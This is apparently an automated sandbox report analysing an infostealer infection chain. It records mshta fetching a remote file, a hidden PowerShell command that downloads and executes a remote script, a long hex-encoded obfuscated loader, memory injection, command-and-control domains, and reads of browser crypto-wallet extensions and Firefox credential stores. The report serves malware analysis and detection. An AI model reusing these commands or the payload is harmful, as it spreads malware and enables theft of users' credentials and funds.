                    Source: mshta.exe, 00000002.00000003.56231710859.00000000031AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.56233772606.0000000003141000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.56249468249.00000000031BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.56246926292.00000000031B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.56246272360.00000000031AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.56249325888.0000000003142000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.57431193652.00000000005EC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.57431193652.0000000000629000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: mshta.exe, 00000002.00000002.56249325888.000000000317A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.56233772606.000000000317A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWl
                    Source: powershell.exe, 00000003.00000002.56226903813.00000000081E6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.56223425893.0000000006DBB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.57195069753.0000000007040000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57276916511.00000218857F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAPI call chain: ExitProcess graph end nodegraph_8-13478
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0043C1F0 LdrInitializeThunk,8_2_0043C1F0
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: Yara matchFile source: amsi32_2576.amsi.csv, type: OTHER
                    Source: Yara matchFile source: amsi32_8336.amsi.csv, type: OTHER
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2576, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8336, type: MEMORYSTR
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://journal.liveview.pw/singl6.vsdx'))"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: powershell.exeString found in binary or memory: rapeflowwj.lat
                    Source: powershell.exeString found in binary or memory: crosshuaht.lat
                    Source: powershell.exeString found in binary or memory: sustainskelet.lat
                    Source: powershell.exeString found in binary or memory: aspecteirs.lat
                    Source: powershell.exeString found in binary or memory: energyaffai.lat
                    Source: powershell.exeString found in binary or memory: necklacebudi.lat
                    Source: powershell.exeString found in binary or memory: discokeyus.lat
                    Source: powershell.exeString found in binary or memory: grannyejh.lat
                    Source: powershell.exeString found in binary or memory: surmisehotte.click
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\mshta.exe "C:\WINDOWS\system32\mshta.exe" https://savecoupons.shop/singl6.mp4Jump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function cDnCn($pBla){return -split ($pBla -replace '..', '0x$& ')};$Lhmk = cDnCn('A3AA4480FF655084E70ADC84D9EA6341178CCA80AF8469B12931F471AF827F36734F649E4FFC481465F7A8A2BFA75783C467F30497BC4B11E481C2530797B14FC2F5B368B22016A880E652482E6475CF0DC1A66EA8F0136B2BBC629A30CEB860956FD49362AEC1529369252FC290E7464876570EB817D8E9B180D541376938391A342371D8EEE7C40B429917ED3BAE7546609A8390B670A9097CB2F4371F68C266424FC610C85C530E515400B772D500AE542F889F9A970F0C0884F9DAB2F28BCD379149C803B7F17EEC6C69E622BA1F8B13247111CF1CCB79B4798B7DFB6AEC68A8F963D9FE6AC1AF1987A9FB2A16B0F82B9BA594307ADEEA757F6284F08DDB1A3BFA98B3BEA493C2C605A6EBF27BFDF963BEF1C0F74C61BB82B80E6A9B2F61E44AC18908A15AC5CA52E0D0B5E7ECA5C629F9CE088140C02670105B1C1EB4C39C449DED3A8E098E14832E1159B7BFE7F74012F5AB28A812BD11B0830216EC8E5F537AD27755CAD7EFBDAEB4C5E6235233729039ACA656A57FB2D8AFEF2960E070779A4CF1BD35291B7033D4618B7FBEC36B04BDD9CC6D825285FE8E9B14F783B7F3071ABE49F6BE8DFE02D7E8B0A4E5FEAD8570B4049362BC3FF9599BEF08430DEA16A596C8E8AA8FEBE25A7D3AEF1A0F1D2A47644C59B18A95C4E955B6A747C547978A1471BD6004B1ECD6443ABC8058ED921C2A97C1449AE376C36FB9DA81ED841F3F4437F69417CEF04ACD68C114464AA5755262E3E2A8804F5D1F018C94308E1802E6C59864386DF18AC9D197902C482A57D3531FCB49886B15046AF78768F80014DE486E0E78D49561586C41C0E653A2A6BB84F1D7467BB73BF1E6FF73E92540FCC809AA398E26B9A708706094D4A5382850472779AD17B69C066B29CAAE8B04F605E50CC29E8480DD31E8DB08E7717139D5A19EE210804AD16CA1445A2EAC4D7C66209914C86431F3B5174ECE947BEBD88F70D5299D63C267D52D0EA77D645EBCDD39A110138C082CD3C09CA8AA75E9A53A689D0576C332EE23948AE9ECCCE522DACC38B3581F9C71CFC27C56F81F9CB5C9D938E2A35C15A5E7CE4C1DB70B003BF969AB7131336F933529CEA80A9FACB8C911FDA0C526986D4E8FB5FDDDA4C0DF5762BE3783933E8E0AB3D712CD3B563309BDB03A5460E12D1C34126A4F89191E1C34197F7EB35212BAA7E9D32890ED00618DFED16C97F2F709899CAEA84C4AA2A7B5371A5FACA3D115E12BE56D873196999184299302AD235C87C226989D2CBEBA4D82E6C270F060D4165DE6962A5077677A4796A0FC82E05AAB1272F50397568327381A2D529A9466317AB38D192E338BDA14927384DF7CCBAFF9E8594748246285B3D8AA54C12D8C53351947654EA52F7B1A29724A48C14A1D4FCAD70EDC954B5D82A932AC8FF8A2DCB79D1C10C7458B14A40215396E306C046B7DD83B83B6EB6FFAE26FF38DE7E40F09DE9FDD00EC21F89B23814EBBD7E5B2A5AA1A2C0CC6814E4C15D127261B29720A28F854382CC18092685037C23B14ED11E90915036D385992F5D948F9775BB8B9C159C5C39C63E68221BF35A5518331151C4C0BACB7B58F5A8B9DF32BD1C3C4828D65896C8DC07B8002C812E8FED5F8FE86A6138586B9DC1F40F9A4E967D8E87CD674633563F6514E3557D8EFDE3A0247843CCA695357E876D6F77804DCB5599681DA62FAED5D52BA3AB823A2D2219C0783C18FBD3FC8897A07B5FEA483FF46AF5F23EB91E20E31A520B6566B846C91212DECBB9F2E6972ADCAB84A64D2DC6EBFA7B5758A915C3A978589C931CEFE5B8868B0256407FA6B78E518E0B7D7A8042BD51A46F9297518C6F4EB262D6525B016FB7D858136FCBF7AF2BC0D0488BEFD0CED9A5213FF3FF1B7B481CB6454CC9C929EDF1779EEFB9842B90ED62994AE6BD859C94C0821F219C5A77E00C97981C5B1F965E0977F82C3EC531C34Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://journal.liveview.pw/singl6.vsdx'))" Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"Jump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function cdncn($pbla){return -split ($pbla -replace '..', '0x$& ')};$lhmk = cdncn('a3aa4480ff655084e70adc84d9ea6341178cca80af8469b12931f471af827f36734f649e4ffc481465f7a8a2bfa75783c467f30497bc4b11e481c2530797b14fc2f5b368b22016a880e652482e6475cf0dc1a66ea8f0136b2bbc629a30ceb860956fd49362aec1529369252fc290e7464876570eb817d8e9b180d541376938391a342371d8eee7c40b429917ed3bae7546609a8390b670a9097cb2f4371f68c266424fc610c85c530e515400b772d500ae542f889f9a970f0c0884f9dab2f28bcd379149c803b7f17eec6c69e622ba1f8b13247111cf1ccb79b4798b7dfb6aec68a8f963d9fe6ac1af1987a9fb2a16b0f82b9ba594307adeea757f6284f08ddb1a3bfa98b3bea493c2c605a6ebf27bfdf963bef1c0f74c61bb82b80e6a9b2f61e44ac18908a15ac5ca52e0d0b5e7eca5c629f9ce088140c02670105b1c1eb4c39c449ded3a8e098e14832e1159b7bfe7f74012f5ab28a812bd11b0830216ec8e5f537ad27755cad7efbdaeb4c5e6235233729039aca656a57fb2d8afef2960e070779a4cf1bd35291b7033d4618b7fbec36b04bdd9cc6d825285fe8e9b14f783b7f3071abe49f6be8dfe02d7e8b0a4e5fead8570b4049362bc3ff9599bef08430dea16a596c8e8aa8febe25a7d3aef1a0f1d2a47644c59b18a95c4e955b6a747c547978a1471bd6004b1ecd6443abc8058ed921c2a97c1449ae376c36fb9da81ed841f3f4437f69417cef04acd68c114464aa5755262e3e2a8804f5d1f018c94308e1802e6c59864386df18ac9d197902c482a57d3531fcb49886b15046af78768f80014de486e0e78d49561586c41c0e653a2a6bb84f1d7467bb73bf1e6ff73e92540fcc809aa398e26b9a708706094d4a5382850472779ad17b69c066b29caae8b04f605e50cc29e8480dd31e8db08e7717139d5a19ee210804ad16ca1445a2eac4d7c66209914c86431f3b5174ece947bebd88f70d5299d63c267d52d0ea77d645ebcdd39a110138c082cd3c09ca8aa75e9a53a689d0576c332ee23948ae9eccce522dacc38b3581f9c71cfc27c56f81f9cb5c9d938e2a35c15a5e7ce4c1db70b003bf969ab7131336f933529cea80a9facb8c911fda0c526986d4e8fb5fddda4c0df5762be3783933e8e0ab3d712cd3b563309bdb03a5460e12d1c34126a4f89191e1c34197f7eb35212baa7e9d32890ed00618dfed16c97f2f709899caea84c4aa2a7b5371a5faca3d115e12be56d873196999184299302ad235c87c226989d2cbeba4d82e6c270f060d4165de6962a5077677a4796a0fc82e05aab1272f50397568327381a2d529a9466317ab38d192e338bda14927384df7ccbaff9e8594748246285b3d8aa54c12d8c53351947654ea52f7b1a29724a48c14a1d4fcad70edc954b5d82a932ac8ff8a2dcb79d1c10c7458b14a40215396e306c046b7dd83b83b6eb6ffae26ff38de7e40f09de9fdd00ec21f89b23814ebbd7e5b2a5aa1a2c0cc6814e4c15d127261b29720a28f854382cc18092685037c23b14ed11e90915036d385992f5d948f9775bb8b9c159c5c39c63e68221bf35a5518331151c4c0bacb7b58f5a8b9df32bd1c3c4828d65896c8dc07b8002c812e8fed5f8fe86a6138586b9dc1f40f9a4e967d8e87cd674633563f6514e3557d8efde3a0247843cca695357e876d6f77804dcb5599681da62faed5d52ba3ab823a2d2219c0783c18fbd3fc8897a07b5fea483ff46af5f23eb91e20e31a520b6566b846c91212decbb9f2e6972adcab84a64d2dc6ebfa7b5758a915c3a978589c931cefe5b8868b0256407fa6b78e518e0b7d7a8042bd51a46f9297518c6f4eb262d6525b016fb7d858136fcbf7af2bc0d0488befd0ced9a5213ff3ff1b7b481cb6454cc9c929edf1779eefb9842b90ed62994ae6bd859c94c0821f219c5a77e00c97981c5b1f965e0977f82c3ec531c34
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function cdncn($pbla){return -split ($pbla -replace '..', '0x$& ')};$lhmk = cdncn('a3aa4480ff655084e70adc84d9ea6341178cca80af8469b12931f471af827f36734f649e4ffc481465f7a8a2bfa75783c467f30497bc4b11e481c2530797b14fc2f5b368b22016a880e652482e6475cf0dc1a66ea8f0136b2bbc629a30ceb860956fd49362aec1529369252fc290e7464876570eb817d8e9b180d541376938391a342371d8eee7c40b429917ed3bae7546609a8390b670a9097cb2f4371f68c266424fc610c85c530e515400b772d500ae542f889f9a970f0c0884f9dab2f28bcd379149c803b7f17eec6c69e622ba1f8b13247111cf1ccb79b4798b7dfb6aec68a8f963d9fe6ac1af1987a9fb2a16b0f82b9ba594307adeea757f6284f08ddb1a3bfa98b3bea493c2c605a6ebf27bfdf963bef1c0f74c61bb82b80e6a9b2f61e44ac18908a15ac5ca52e0d0b5e7eca5c629f9ce088140c02670105b1c1eb4c39c449ded3a8e098e14832e1159b7bfe7f74012f5ab28a812bd11b0830216ec8e5f537ad27755cad7efbdaeb4c5e6235233729039aca656a57fb2d8afef2960e070779a4cf1bd35291b7033d4618b7fbec36b04bdd9cc6d825285fe8e9b14f783b7f3071abe49f6be8dfe02d7e8b0a4e5fead8570b4049362bc3ff9599bef08430dea16a596c8e8aa8febe25a7d3aef1a0f1d2a47644c59b18a95c4e955b6a747c547978a1471bd6004b1ecd6443abc8058ed921c2a97c1449ae376c36fb9da81ed841f3f4437f69417cef04acd68c114464aa5755262e3e2a8804f5d1f018c94308e1802e6c59864386df18ac9d197902c482a57d3531fcb49886b15046af78768f80014de486e0e78d49561586c41c0e653a2a6bb84f1d7467bb73bf1e6ff73e92540fcc809aa398e26b9a708706094d4a5382850472779ad17b69c066b29caae8b04f605e50cc29e8480dd31e8db08e7717139d5a19ee210804ad16ca1445a2eac4d7c66209914c86431f3b5174ece947bebd88f70d5299d63c267d52d0ea77d645ebcdd39a110138c082cd3c09ca8aa75e9a53a689d0576c332ee23948ae9eccce522dacc38b3581f9c71cfc27c56f81f9cb5c9d938e2a35c15a5e7ce4c1db70b003bf969ab7131336f933529cea80a9facb8c911fda0c526986d4e8fb5fddda4c0df5762be3783933e8e0ab3d712cd3b563309bdb03a5460e12d1c34126a4f89191e1c34197f7eb35212baa7e9d32890ed00618dfed16c97f2f709899caea84c4aa2a7b5371a5faca3d115e12be56d873196999184299302ad235c87c226989d2cbeba4d82e6c270f060d4165de6962a5077677a4796a0fc82e05aab1272f50397568327381a2d529a9466317ab38d192e338bda14927384df7ccbaff9e8594748246285b3d8aa54c12d8c53351947654ea52f7b1a29724a48c14a1d4fcad70edc954b5d82a932ac8ff8a2dcb79d1c10c7458b14a40215396e306c046b7dd83b83b6eb6ffae26ff38de7e40f09de9fdd00ec21f89b23814ebbd7e5b2a5aa1a2c0cc6814e4c15d127261b29720a28f854382cc18092685037c23b14ed11e90915036d385992f5d948f9775bb8b9c159c5c39c63e68221bf35a5518331151c4c0bacb7b58f5a8b9df32bd1c3c4828d65896c8dc07b8002c812e8fed5f8fe86a6138586b9dc1f40f9a4e967d8e87cd674633563f6514e3557d8efde3a0247843cca695357e876d6f77804dcb5599681da62faed5d52ba3ab823a2d2219c0783c18fbd3fc8897a07b5fea483ff46af5f23eb91e20e31a520b6566b846c91212decbb9f2e6972adcab84a64d2dc6ebfa7b5758a915c3a978589c931cefe5b8868b0256407fa6b78e518e0b7d7a8042bd51a46f9297518c6f4eb262d6525b016fb7d858136fcbf7af2bc0d0488befd0ced9a5213ff3ff1b7b481cb6454cc9c929edf1779eefb9842b90ed62994ae6bd859c94c0821f219c5a77e00c97981c5b1f965e0977f82c3ec531c34Jump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: powershell.exe, 00000008.00000002.57437193107.0000000004C66000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 9160, type: MEMORYSTR
                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                    Source: powershell.exe, 00000008.00000002.57431193652.000000000061B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
                    Source: powershell.exe, 00000008.00000002.57431193652.000000000061B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                    Source: powershell.exe, 00000008.00000002.57431193652.000000000061B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                    Source: powershell.exe, 00000008.00000002.57431193652.0000000000629000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/JAXX New Version
                    Source: powershell.exe, 00000008.00000002.57431193652.0000000000629000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                    Source: powershell.exe, 00000008.00000002.57431193652.0000000000629000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                    Source: powershell.exe, 00000008.00000002.57431193652.000000000061B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
                    Source: powershell.exe, 00000003.00000002.56225694102.0000000007590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sqlcolumnencryptionkeystoreprovider
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\places.sqliteJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cert9.dbJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
